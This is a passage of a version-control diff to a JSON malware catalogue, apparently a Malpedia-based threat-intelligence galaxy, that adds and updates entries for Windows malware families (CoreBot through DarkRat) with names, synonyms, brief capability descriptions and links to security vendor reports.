"value": "Contopee" }, @@ -6204,9 +12098,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot", - "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/02/ASERT-Threat-Intelligence-Brief-2016-02-Corebot-1.pdf", - "http://blog.deepinstinct.com/2017/11/08/a-deeper-dive-into-corebots-comeback/" + "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/" ], "synonyms": [], "type": [] @@ -6219,7 +12111,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coredn", - "https://blog.talosintelligence.com/2019/01/fake-korean-job-posting.html" + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://blog.talosintelligence.com/2019/01/fake-korean-job-posting.html", + "https://www.symantec.com/security-center/writeup/2018-021216-4405-99#technicaldescription", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/#atricle-content", + "https://blog.alyac.co.kr/2105" ], "synonyms": [], "type": [] @@ -6232,12 +12128,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "http://malware.prevenity.com/2014/08/malware-info.html", "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", - "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html", - "http://malware.prevenity.com/2014/08/malware-info.html" + "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html" + ], + "synonyms": [ + "SOURFACE" ], - "synonyms": [], "type": [] }, "uuid": "579cc23d-4ba4-419f-bf8a-f235ed33125e", @@ -6247,8 +12146,82 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cradlecore", - "https://blogs.forcepoint.com/security-labs/cradlecore-ransomware-source-code-sale" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.coronavirus_ransomware", + "https://id-ransomware.blogspot.com/2020/03/coronavirus-ransomware.html" + ], + "synonyms": [ + "CoronaVirus Cover-Ransomware" + ], + "type": [] + }, + "uuid": "ba683942-1524-459a-ad46-827464967164", + "value": "CoronaVirus Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cotx", + "https://www.youtube.com/watch?v=1WfPlgtfWnQ", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://vblocalhost.com/uploads/VB2020-20.pdf", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", + "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology", + "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "47190b56-5176-4e8b-8c78-fcc10e511fa2", + "value": "Cotx RAT" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.covicli", + "https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf" + ], + "synonyms": [ + "Covically" + ], + "type": [] + }, + "uuid": "e8986c0c-2997-425d-ae4e-529f82d3fa48", + "value": "Covicli" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.coviper", + "https://decoded.avast.io/janrubin/coviper-locking-down-computers-during-lockdown/", + "https://tccontre.blogspot.com/2020/04/covid19-malware-analysis-with-kill-mbr.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4d7d8496-52a6-47dc-abfe-4997af6dc465", + "value": "CoViper" + }, + { + "description": "CRACKSHOT is a downloader that can download files, including binaries, and run them from the hard disk or execute them directly in memory. It is also capable of placing itself into a dormant state.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crackshot", + "https://content.fireeye.com/apt-41/rpt-apt41/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cfa111c1-3740-4832-8e89-12a536f4fff9", + "value": "crackshot" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cradlecore" ], "synonyms": [], "type": [] @@ -6257,24 +12230,19 @@ "value": "CradleCore" }, { - "description": "", + "description": "According to Cisco Talos, CRAT is a remote access trojan with plugin capabilites, used by Lazarus since at least May 2020.", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.crashoverride", - "https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/", - "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf", - "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf", - "https://www.virusbulletin.com/conference/vb2017/abstracts/last-minute-paper-industroyer-biggest-threat-industrial-control-systems-stuxnet/", - "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/" - ], - "synonyms": [ - "Crash", - "Industroyer" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crat", + "https://mp.weixin.qq.com/s/2sV-DrleHiJMSpSCW0kAMg", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://blog.talosintelligence.com/2020/11/crat-and-plugins.html" ], + "synonyms": [], "type": [] }, - "uuid": "610d5ce7-c9c8-4fb1-94d9-69b7cb5397b6", - "value": "CrashOverride" + "uuid": "ca901b56-b733-44af-aee2-38da79188dcb", + "value": "CRAT" }, { "description": "", @@ -6319,12 +12287,24 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson", - "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", "https://s.tencent.com/research/report/669.html", - "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF" + "https://blog.yoroi.company/research/transparent-tribe-four-years-later", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF", + "https://securelist.com/transparent-tribe-part-2/98233/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.secrss.com/articles/24995", + "https://twitter.com/teamcymru/status/1351228309632385027", + "https://securelist.com/transparent-tribe-part-1/98127/", + "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", + "https://www.secureworks.com/research/threat-profiles/copper-fieldstone", + "https://www.seqrite.com/blog/operation-honey-trap-apt36-targets-defense-organizations-in-india/" ], "synonyms": [ - "SEEDOOR" + "SEEDOOR", + "Scarimson" ], "type": [] }, @@ -6332,19 +12312,67 @@ "value": "Crimson RAT" }, { - "description": "", + "description": "According to ThreatConnect, CrimsonIAS is a Delphi-written backdoor dating back to at least 2017. It enables operators to run command line tools, exfiltrate files, and upload files to the infected machine. CrimsonIAS is notable as it listens for incoming connections only; making it different from typical Windows backdoors that beacons out.", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.crisis", - "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?", - "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", - "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crimsonias", + "https://threatconnect.com/blog/crimsonias-listening-for-an-3v1l-user/" ], "synonyms": [], "type": [] }, - "uuid": "4b2ab902-811e-4b50-8510-43454d77d027", - "value": "Crisis (Windows)" + "uuid": "6f2a68d1-06a9-4657-98d8-590a6446e475", + "value": "CrimsonIAS" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cring", + "https://twitter.com/swisscom_csirt/status/1354052879158571008" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f5a19987-d0b6-4cc3-89ab-d4540f2e9744", + "value": "Cring Ransomware" + }, + { + "description": "According to FireEye, CROSSWALK is a skeletal, modular backdoor capable of system survey and adding modules in response to C&C replies.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crosswalk", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://www.youtube.com/watch?v=8x-pGlWpIYI", + "https://www.carbonblack.com/2019/09/30/cb-threat-analysis-unit-technical-analysis-of-crosswalk/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://content.fireeye.com/apt-41/rpt-apt41/", + "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-state-sponsored-espionage-group-targeting-multiple-verticals-with-crosswalk/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", + "https://twitter.com/MrDanPerez/status/1159459082534825986" + ], + "synonyms": [ + "Motnug", + "ProxIP" + ], + "type": [] + }, + "uuid": "7ca7c08b-36fd-46b3-8b9e-a8b0d4743433", + "value": "CROSSWALK" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crutch", + "https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e7dc138f-00cb-4db6-a6e7-3ecac853285d", + "value": "Crutch" }, { "description": "", @@ -6352,13 +12380,19 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryakl", "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx", - "https://www.v3.co.uk/v3-uk/news/3026414/belgian-police-release-decryption-keys-for-cryakl-ransomware", "https://hackmag.com/security/ransomware-russian-style/", "https://securelist.com/the-return-of-fantomas-or-how-we-deciphered-cryakl/86511/", "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/", + "https://twitter.com/albertzsigovits/status/1217866089964679174", + "https://twitter.com/bartblaze/status/1305197264332369920", + "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", + "https://bartblaze.blogspot.com/2016/02/vipasana-ransomware-new-ransom-on-block.html", + "https://blog.checkpoint.com/2015/11/04/offline-ransomware-encrypts-your-data-without-cc-communication/", "https://twitter.com/demonslay335/status/971164798376468481" ], - "synonyms": [], + "synonyms": [ + "CryLock" + ], "type": [] }, "uuid": "32fa6c53-b4fc-47f8-894c-1ea74180e02f", @@ -6403,12 +12437,57 @@ "uuid": "38b38f8c-944d-4062-bf35-561e8a81c8d2", "value": "Crypt0l0cker" }, + { + "description": "A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot", + "https://www.gdatasoftware.com/blog/2020/02/35802-bitbucket-abused-as-malware-slinger" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2274aaf6-4807-4cda-8f5b-16a757f4ff23", + "value": "CryptBot" + }, + { + "description": "CrypticConvo is a dropper trojan which appears to be embedded in an automatic generator framework to deliver the FakeM trojan. According to PaloaltoNetworks CrypticConvo and several additional trojans are believed to be included in a meta framework used by the \"Scarlet Mimic\" threat actor in order to quickly evade AV systems.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptic_convo", + "https://unit42.paloaltonetworks.com/scarlet-mimic-years-long-espionage-targets-minority-activists/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "972fbb7b-6945-42d8-ba88-a7b4e6fc1ad4", + "value": "CrypticConvo" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptodarkrubix", + "https://id-ransomware.blogspot.com/2020/03/cryptodarkrubix-ransomware.html" + ], + "synonyms": [ + "Ranet" + ], + "type": [] + }, + "uuid": "c6d09bb2-5673-4b2b-b2cb-5d14f2568189", + "value": "CryptoDarkRubix" + }, { "description": "CryptoLocker is a new sophisticated malware that was launched in the late 2013. It is designed to attack Windows operating system by encrypting all the files from the system using a RSA-2048 public key. To decrypt the mentioned files, the user has to pay a ransom (usually 300 USD/EUR) or 2 BitCoins.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://www.secureworks.com/research/threat-profiles/gold-evergreen", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", "https://www.secureworks.com/research/cryptolocker-ransomware" ], "synonyms": [], @@ -6431,11 +12510,12 @@ "value": "CryptoLuck" }, { - "description": "", + "description": "A variant of CryptoMix is win.clop. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptomix", "https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/", + "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/", "https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/" ], "synonyms": [ @@ -6446,6 +12526,19 @@ "uuid": "55d5742e-20f5-4c9a-887a-4dbd5b37d921", "value": "CryptoMix" }, + { + "description": "CryptoPatronum is a ransomware that encrypts user data through AES-256 (CBC) and it asks for BTC / ETH in order to get back the original files. In the ransom note there is not a title but only a reference to crsss.exe: its original file name. Once the files are encrypted, CryptoPatronum adds a .enc extension. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptopatronum", + "https://id-ransomware.blogspot.com/2020/01/cryptopatronum-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "738acbd6-d0b7-40fd-bc1b-d7fbb74cbbf9", + "value": "CryptoPatronum" + }, { "description": "", "meta": { @@ -6490,7 +12583,10 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://ryancor.medium.com/genetic-analysis-of-cryptowall-ransomware-843f86055c7f", + "https://sites.temple.edu/care/ci-rw-attacks/" ], "synonyms": [], "type": [] @@ -6517,7 +12613,6 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_fortress", "https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/", - "https://www.lexsi.com/securityhub/cryptofortress/?lang=en", "http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html" ], "synonyms": [], @@ -6544,7 +12639,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptxxxx", - "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/" + "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/", + "https://www.sentinelone.com/blog/sophisticated-new-packer-identified-in-cryptxxx-ransomware-sample/" ], "synonyms": [], "type": [] @@ -6565,19 +12661,43 @@ "uuid": "c6a46f63-3ff1-4952-8350-fad9816b45c9", "value": "CsExt" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ctb_locker", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://samvartaka.github.io/malware/2015/11/20/ctb-locker" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e8e28718-fe55-4d31-8b84-f8ff0acf0614", + "value": "CTB Locker" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuba", + "https://id-ransomware.blogspot.com/2019/12/cuba-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6d9dfc5f-4ebf-404b-ab5e-e6497867fe65", + "value": "Cuba Ransomware" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3451", "http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html", "https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal" ], - "synonyms": [ - "Windshield?" - ], + "synonyms": [], "type": [] }, "uuid": "1dc53eb8-ffae-4823-9c11-3c01514398b9", @@ -6596,12 +12716,27 @@ "uuid": "64d40102-c296-4a85-9b9c-b3afb6d58e09", "value": "Cueisfry" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cursed_murderer", + "https://id-ransomware.blogspot.com/2020/01/thecursedmurderer-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "600a73bf-d699-4400-ac35-6aed4ae5e528", + "value": "Cursed Murderer Ransomware" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutlet", - "http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html" + "http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html", + "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", + "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html" ], "synonyms": [], "type": [] @@ -6613,7 +12748,18 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail", + "http://www.secureworks.com/research/threat-profiles/gold-essex", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.mimecast.com/blog/how-to-slam-a-door-on-the-cutwail-botnet-enforce-dmarc/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-essex", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf", + "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/" ], "synonyms": [], "type": [] @@ -6626,7 +12772,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cybergate", - "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", + "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", + "https://blog.reversinglabs.com/blog/rats-in-the-library", + "https://citizenlab.ca/2015/12/packrat-report/" ], "synonyms": [ "Rebhip" @@ -6661,6 +12811,87 @@ "uuid": "dcdd98a7-aad2-4a96-a787-9c4665bbb1b8", "value": "CycBot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cyrat", + "https://www.gdatasoftware.com/blog/cyrat-ransomware", + "https://id-ransomware.blogspot.com/2020/08/cyrat-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1995ed0a-81d9-43ca-9b38-6f001af84bbc", + "value": "Cyrat Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cysxl", + "https://www.enigmasoftware.com/bkdrcysxla-removal/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8db13fca-8f75-44dd-b507-e4d3f9c69d78", + "value": "cysxl" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dacls", + "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/", + "https://blog.netlab.360.com/dacls-the-dual-platform-rat/", + "https://www.sygnia.co/mata-framework", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7c2b19be-f06b-4b21-b003-144e92d291d1", + "value": "Dacls (Windows)" + }, + { + "description": "DADJOKE was discovered as being distributed via email, targeting a South-East Asian Ministry of Defense. It is delivered as an embedded EXE file in a Word document using remote templates and a unique macro using multiple GET requests. The payload is deployed using load-order hijacking with a benign Windows Defender executable. Stage 1 has only beacon+download functionality, made to look like a PNG file. Additional analysis by Kaspersky found 8 campaigns over 2019 and no activity prior to January 2019, DADJOKE is attributed with medium confidence to APT40.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dadjoke", + "https://medium.com/@Sebdraven/apt-40-in-malaysia-61ed9c9642e9", + "https://twitter.com/a_tweeter_user/status/1154764787823316993", + "https://twitter.com/ClearskySec/status/1110941178231484417", + "https://www.youtube.com/watch?v=vx9IB88wXSE", + "https://prezi.com/view/jGyAzyy5dTOkDrtwsJi5/", + "https://wemp.app/posts/80ab2b2d-4e0e-4960-94b7-4d452a06fd38?utm_source=latest-posts" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3cf1aa5a-c19d-4b50-a604-e445e1e2b4f1", + "value": "DADJOKE" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dadstache", + "https://medium.com/insomniacs/dad-theres-a-rat-in-here-e3729b65bf7a", + "https://medium.com/insomniacs/apt40-goes-from-template-injections-to-ole-linkings-for-payload-delivery-99eb43170a97", + "https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign", + "https://danielplohmann.github.io/blog/2020/07/10/kf-sandbox-necromancy.html", + "https://twitter.com/killamjr/status/1204584085395517440", + "https://twitter.com/cyb3rops/status/1199978327697694720" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cd9aac83-bdd0-4622-ae77-405d5b9c1dc5", + "value": "DADSTACHE" + }, { "description": "", "meta": { @@ -6675,21 +12906,32 @@ "value": "Dairy" }, { - "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ", + "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on \u201cquality over quantity\u201d in email-based threats. DanaBot\u2019s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot", - "https://0ffset.wordpress.com/2018/06/05/post-0x08-analyzing-danabot-downloader/", - "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns", - "https://asert.arbornetworks.com/danabots-travels-a-global-perspective/", - "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/", - "https://www.fortinet.com/blog/threat-research/breakdown-of-a-targeted-danabot-attack.html", - "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0", + "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", "https://www.proofpoint.com/us/threat-insight/post/danabot-control-panel-revealed", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/", - "https://www.welivesecurity.com/2018/12/06/danabot-evolves-beyond-banking-trojan-new-spam/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://www.welivesecurity.com/2019/02/07/danabot-updated-new-cc-communication/", - "https://blog.yoroi.company/research/dissecting-the-danabot-paylaod-targeting-italy/" + "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/", + "https://www.proofpoint.com/us/blog/threat-insight/new-year-new-version-danabot", + "https://www.gdatasoftware.com/blog/2019/05/31695-strange-bits-smuggling-malware-github", + "https://www.fortinet.com/blog/threat-research/breakdown-of-a-targeted-danabot-attack.html", + "https://asert.arbornetworks.com/danabots-travels-a-global-perspective/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://malwareandstuff.com/deobfuscating-danabots-api-hashing/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://research.checkpoint.com/danabot-demands-a-ransom-payment/", + "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns", + "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/", + "https://blog.yoroi.company/research/dissecting-the-danabot-paylaod-targeting-italy/", + "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", + "https://www.welivesecurity.com/2018/12/06/danabot-evolves-beyond-banking-trojan-new-spam/", + "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/" ], "synonyms": [], "type": [] @@ -6699,17 +12941,41 @@ }, { "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.danbot", + "https://dragos.com/wp-content/uploads/Dragos-Oil-and-Gas-Threat-Perspective-2019.pdf", + "https://www.secureworks.com/research/threat-profiles/cobalt-lyceum", + "https://otx.alienvault.com/pulse/5d4301edb3f3406ac01acc0f", + "https://cyberx-labs.com/blog/deep-dive-into-the-lyceum-danbot-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "98d3c6b3-c29f-46ba-b24d-88b135cd3183", + "value": "danbot" + }, + { + "description": "DarkComet is one of the most famous RATs, developed by Jean-Pierre Lesueur in 2008. After being used in the Syrian civil war in 2011, Lesuer decided to stop developing the trojan. Indeed, DarkComet is able to enable control over a compromised system through use of a simple graphic user interface. Experts think that this user friendliness is the key of its mass success.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html", + "https://www.secureworks.com/research/threat-profiles/copper-fieldstone", + "https://www.sysnet.ucsd.edu/sysnet/miscpapers/darkmatter-www20.pdf", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html", "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/", - "https://darkcomet.net", + "https://www.tgsoft.it/files/report/download.asp?id=7481257469", + "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.DarkComet", "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/" ], "synonyms": [ + "Breut", "Fynloski", "klovbot" ], @@ -6762,12 +13028,24 @@ "uuid": "1aecd6eb-80e2-4598-8504-d93f69c7a8f0", "value": "DarkPulsar" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkrat", + "https://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md" + ], + "synonyms": [], + "type": [] + }, + "uuid": "bcff979f-2b4b-41cc-86c9-fe1ea3adce6e", + "value": "DarkRat" + }, { "description": "DarkShell is a DDoS bot seemingly of Chinese origin, discovered 